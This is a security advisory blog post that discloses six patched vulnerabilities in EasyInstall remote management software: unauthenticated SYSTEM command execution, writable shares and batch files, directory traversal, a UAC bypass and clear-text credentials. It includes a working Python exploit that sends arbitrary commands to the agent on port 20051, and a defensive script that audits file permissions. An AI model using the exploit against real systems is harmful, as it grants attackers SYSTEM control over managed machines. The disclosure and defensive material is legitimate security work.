Multiple vulnerabilities in EasyInstall RMM and deployment software

This blog post highlights bugs found in installed software during a customer engagement and reported in line with the Improsec Responsible Disclosure Policy.

Timeline

  • Improsec identified the vulnerabilities during a customer engagement. Each vulnerability was validated in a simulated Active Directory Lab afterwards.

  • The vulnerabilities were disclosed to the vendor, IXP Data, on November 11 of 2019.

  • IXP Data released EasyInstall version 6.3.101, which patches all six vulnerabilities, on November 15 of 2019.

  • We want to thank IXP Data for an effective and professional response.

CVEs registered (see appendix for more details)

  • CVE #1: CVE-2019-19897 - Remote Code Execution as SYSTEM via EasyInstall Agent Service

  • CVE #2: CVE-2019-19896 - Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share

  • CVE #3: CVE-2019-19893 - Directory Traversal (TCP 8000) as SYSTEM via EasyInstall Engine Service

  • CVE #4: CVE-2019-19895 - Lateral Movement using EasyInstall Agent Service against other users on client system

  • CVE #5: CVE-2019-19894 - Disable UAC using EasyInstall Agent Service on client system

  • CVE #6: CVE-2019-19898 - Clear-text credentials in network communication (TCP 20050) when using EasyInstall Administrator console

What is EasyInstall (IXP)

EasyInstall is a remote management and deployment suite created by IXP Data. A typical setup consists of an EasyInstall Server and a number of clients, each with an EasyInstall agent installed. The agent runs as a service executable on the deployed Windows clients.

The affected and tested version is: 6.2.13723


Remote Code Execution as SYSTEM via EasyInstall Agent Service

CVE-ID: CVE-2019-19897

The EasyInstall admin management client features a remote command execution function. This function connects over TCP port 20051 to the agent on the selected client. By intercepting the TCP packet with Wireshark we found that the agent performed no authentication or origin check on the packet it received.

[Screenshot: remote command packet viewed in Wireshark]

The captured packet carried a number of fields, but most of them could be left empty. The required packet structure consists of:

  1. Header bytes (\x37\x09)

  2. Server name (not needed)

  3. Separator byte (\x09)

  4. Server IP (not needed)

  5. Separator byte (\x09)

  6. Server name in lowercase (not needed)

  7. Separator byte (\x09)

  8. Agent hostname

  9. Separator byte (\x09)

  10. Port (not needed)

  11. Separator byte (\x09)

  12. Agent version @ server name (not needed)

  13. Separator byte (\x09)

  14. Command to execute

A simple Python script sending the above packet from any computer on the LAN gains remote code execution as “NT AUTHORITY\SYSTEM” on the client.
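The packet layout above, written out in Python as an added example; this is not the script used in the original engagement. The ASCII encoding, the empty defaults for the fields marked "not needed", and the absence of any trailing terminator are assumptions taken only from the field list above. The parse_packet helper is the inverse of the builder and is the piece a defender would reuse when writing a detection for unexpected traffic to port 20051.

```python
import socket

HEADER = b"\x37\x09"   # the two header bytes observed on the wire
SEP = b"\x09"          # every field is separated by a single tab

FIELD_NAMES = ("server_name", "server_ip", "server_name_lower",
               "agent_hostname", "port", "agent_version", "command")


def build_packet(agent_hostname, command, server_name="", server_ip="",
                 port="", agent_version=""):
    """Lay out the 14-element packet: header, then seven tab-separated fields.

    Fields the post marks as "not needed" default to empty strings; the agent
    only acts on its own hostname and the command. ASCII encoding is an
    assumption (the capture shows printable ASCII only).
    """
    fields = [
        server_name,
        server_ip,
        server_name.lower(),   # field 6 is just the server name lowercased
        agent_hostname,
        str(port),
        agent_version,
        command,
    ]
    return HEADER + SEP.join(f.encode("ascii") for f in fields)


def parse_packet(data):
    """Inverse of build_packet; returns a dict or None if the layout is wrong.

    The command is the last field and may itself contain tabs, so the split
    is capped at six separators.
    """
    if not data.startswith(HEADER):
        return None
    parts = data[len(HEADER):].split(SEP, 6)
    if len(parts) != len(FIELD_NAMES):
        return None
    return dict(zip(FIELD_NAMES, (p.decode("ascii", "replace") for p in parts)))


def send_command(agent_ip, agent_hostname, command, agent_port=20051, timeout=5.0):
    """Open a TCP connection to the agent service and deliver one packet.

    Returns the number of bytes written. Nothing is read back: the post does
    not describe a response, so none is assumed.
    """
    pkt = build_packet(agent_hostname, command)
    with socket.create_connection((agent_ip, agent_port), timeout=timeout) as s:
        s.sendall(pkt)
    return len(pkt)


if __name__ == "__main__":
    import sys
    # usage: python ixp_agent_cmd.py <agent-ip> <agent-hostname> <command...>
    ip, host, cmd = sys.argv[1], sys.argv[2], " ".join(sys.argv[3:])
    print(f"sent {send_command(ip, host, cmd)} bytes to {ip}:20051")
```

Run it against a lab client only; the agent executes whatever arrives in the last field as SYSTEM.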

[Screenshot: sending the packet to the client]

[Screenshot: cmd.exe executed as “NT AUTHORITY\SYSTEM” on the client]

Recommendation

Update to the newest version of EasyInstall.

Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share

CVE-ID: CVE-2019-19896

The default EasyInstall installation creates a network share called “IXP$” on the EasyInstall server. Authenticated Active Directory users have read/write access to this share and to some of its sub-directories. This allows multiple ways of achieving remote code execution on the EasyInstall server and its clients, as well as privilege escalation on clients.

To obtain remote code execution on the EasyInstall server, we inserted commands into the BAT file “Report.bat” in the sub-directory “AUTOMATION”. EasyInstall executes this file whenever it creates usage reports, either automatically or on manual request, and it runs as “NT AUTHORITY\SYSTEM” on the EasyInstall server.

[Screenshot: full access rights to the IXP$ share for Authenticated Users]

[Screenshot: adding commands to writable BAT files on the IXP server share]

[Screenshot: remote code execution on the IXP server]

Recommendation

Update to the newest version of EasyInstall.

Directory Traversal (TCP 8000) as SYSTEM via EasyInstall Engine Service

CVE-ID: CVE-2019-19893

The EasyInstall server by default runs a custom web server on TCP port 8000. This web server serves the IXP data directory to anyone who connects to it. By performing a directory traversal it was possible to read any file on the IXP server in the user context of “NT AUTHORITY\SYSTEM”.

[Screenshot: performing directory traversal]

[Screenshot: performing directory traversal into a directory restricted to local administrators]

Recommendation

Update to the newest version of EasyInstall.

Lateral Movement using EasyInstall Agent Service against other users on client system

CVE-ID: CVE-2019-19895

When software packages are deployed to a client system, the sub-directory “C:” is used as a storage location for the various installation and configuration files. Each package is placed in its own sub-directory with a defined name (e.g. AND00001 or SW000231). All authenticated users have read/write access to these sub-directories and their contents. At user logon the EasyInstall agent traverses each “C:” sub-directory for BAT files named “EveryLogon.bat” and executes them in the context of the logged-on user.

By inserting commands into an “EveryLogon.bat” file, we could run code as every other user who subsequently logged on to the client, which is what makes this usable for lateral movement on the client system.

[Screenshot: file permissions on “EveryLogon.bat”]

[Screenshot: inserting commands into the BAT file]

Recommendation

Update to the newest version of EasyInstall.

Disable UAC using EasyInstall Agent Service on client system

CVE-ID: CVE-2019-19894

The IXP agent is installed by default to the directory “C:”. Reading, writing and listing this directory are restricted by default, but the sub-directory “C:”, which holds the agent's configuration files, does not restrict modification of the files it contains. This allowed us to rename the original configuration file “IXPAS.IXP” and put a modified copy in its place. The configuration file contains the option “DisableUAC”, whose default value leaves UAC enabled. Setting the value to “0” and rebooting the client disabled UAC for all users; one further reboot restored the default setting.
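CVE-2019-19896, CVE-2019-19895 and CVE-2019-19894 share one root cause: a file that a privileged process later executes or reads (Report.bat on the IXP$ share, EveryLogon.bat in the package directories, IXPAS.IXP in the agent's configuration directory) is writable by ordinary domain users. The following check is an added example, not tooling from the original post or from IXP Data: it parses `icacls` output and flags ACEs that grant Authenticated Users, Users or Everyone any write-class right. The icacls output format and the rights abbreviations are standard Windows behaviour; the sample output embedded below is constructed, and the server name in its UNC path is a placeholder (the share name, sub-directory and file name are the ones named in the post).

```python
import re
import subprocess
import sys

# icacls rights that let a principal change or replace a file: the simple
# rights full/modify/write/delete and the specific rights write-data,
# append-data, write-attributes, write-extended-attributes, delete, delete-
# child, generic-write/all, and write-DAC/owner (which let the ACL be rewritten).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DE", "DC",
                "GW", "GA", "WDAC", "WO"}

# Groups every domain account belongs to, by name and by well-known SID.
LOW_PRIV_PRINCIPALS = {
    "nt authority\\authenticated users", "s-1-5-11",
    "builtin\\users", "s-1-5-32-545",
    "everyone", "s-1-1-0",
}

_ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(path, output):
    """Parse the output of `icacls <path>` into a list of (principal, rights).

    icacls prints `<path> <principal>:<rights>` on the first line, one
    indented `<principal>:<rights>` per further ACE, then a summary line.
    Inheritance flags such as (OI)(CI)(I) land in the rights set as well;
    find_writable() simply ignores them.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):          # first line carries the path
            line = line[len(path):].strip()
        m = _ACE_RE.match(line)
        if not m:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            rights.update(r.strip() for r in group.split(","))
        aces.append((m.group("principal"), rights))
    return aces


def find_writable(aces):
    """Return (principal, granted write rights) for low-privileged groups.

    Deny ACEs (marked (DENY) by icacls) are skipped; they never add access.
    """
    findings = []
    for principal, rights in aces:
        if "DENY" in rights or principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = rights & WRITE_RIGHTS
        if granted:
            findings.append((principal, granted))
    return findings


def audit(paths):
    """Run icacls on each path (Windows only) and map path -> findings."""
    if sys.platform != "win32":
        raise RuntimeError("icacls is only available on Windows")
    results = {}
    for path in paths:
        proc = subprocess.run(["icacls", path], capture_output=True, text=True)
        results[path] = find_writable(parse_icacls(path, proc.stdout))
    return results


# Constructed sample: what icacls prints for a Report.bat that Authenticated
# Users can modify. "server" is a placeholder host name.
SAMPLE_PATH = r"\\server\IXP$\AUTOMATION\Report.bat"
SAMPLE_OUTPUT = r"""\\server\IXP$\AUTOMATION\Report.bat NT AUTHORITY\Authenticated Users:(M)
                                       BUILTIN\Administrators:(F)
                                       NT AUTHORITY\SYSTEM:(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path, findings in audit(targets).items():
            print(path, "->", findings or "ok")
    else:
        print(find_writable(parse_icacls(SAMPLE_PATH, SAMPLE_OUTPUT)))
```

Point it at the IXP$ share, the package sub-directories on a client and the agent's configuration directory; any line it prints is a location where an unprivileged user can plant content that SYSTEM or another user will later execute or load.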

[Screenshot: UAC enabled by default]

[Screenshot: disabling UAC via a modified “IXPAS.IXP”]

[Screenshot: UAC disabled after reboot]

Recommendation

Update to the newest version of EasyInstall.

Clear-text credentials in network communication (TCP 20050) when using EasyInstall Administrator console

CVE-ID: CVE-2019-19898

The IXP Administrator application “IXPADM64.EXE” is used by IXP administrators to connect to the deployed IXP server, either on localhost or on a remote host. When connecting to a remote server, the administrator username and password are sent in clear text to the IXP server instance during login.

[Screenshot: username “easyinstall_adm” and password (hidden with a red block) in the TCP packet]

Recommendation

Update to the newest version of EasyInstall.

(Updated January 23, fixed CVE IDs and links)